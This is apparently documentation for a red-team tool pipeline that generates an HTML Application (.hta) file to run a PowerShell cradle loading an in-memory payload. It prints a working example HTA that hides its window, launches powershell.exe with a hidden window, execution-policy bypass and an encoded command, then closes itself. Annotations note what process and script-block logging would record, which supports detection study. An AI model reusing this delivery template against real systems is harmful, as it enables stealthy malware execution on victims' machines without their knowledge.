Description
This pipeline generates an HTML Application (.hta) file that runs a PowerShell cradle command as a child process.
Overview
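This pipeline generates a Microsoft HTML Application file (.hta) that runs a PowerShell cradle to load a SpecterInsight payload into memory. When the file is opened, its script starts powershell.exe with a hidden window as a child of the HTA host process (mshta.exe by default) and passes the cradle as an -EncodedCommand argument. That parent/child relationship and command line are what process-creation logging records.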
Example Output
<!DOCTYPE html>
<html>
<head>
<!-- Annotation (not part of the generated output): the HTA:APPLICATION
     attributes below start the window minimized, without a caption bar,
     without minimize/maximize buttons and without a taskbar entry, so
     nothing is shown to the user while the script runs. -->
<HTA:APPLICATION ID="CS"
APPLICATIONNAME="Application"
WINDOWSTATE="minimize"
MAXIMIZEBUTTON="no"
MINIMIZEBUTTON="no"
CAPTION="no"
SHOWINTASKBAR="no">
<script>
// Annotation: instantiates the WScript.Shell COM object, whose Run method
// starts a new process from a command-line string.
a = new ActiveXObject('Wscript.Shell');
// Annotation: command line for the child process. -NoExit keeps the
// PowerShell process alive after the command finishes, -ExecutionPolicy
// Bypass sets the script execution policy for this process only, and
// -EncodedCommand takes the command as Base64 of a UTF-16LE string. The
// encoded value is elided on this page. Process-creation events that
// include the command line capture this string as written; PowerShell
// script block logging records the decoded command.
cmd = "powershell.exe -NoExit -ExecutionPolicy Bypass -EncodedCommand \"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\"";
// Annotation: window style 0 hides the child's window. The third argument
// (wait-on-return) is omitted, so Run returns without waiting for
// PowerShell to exit.
a.Run(cmd,0);
// Annotation: closes the HTA window right after the launch. Because of
// -NoExit the PowerShell process is expected to outlive the HTA host, so
// the recorded parent process may already have exited when the event is
// reviewed.
window.close();
</script>
</head>
<body>
</body>
</html>
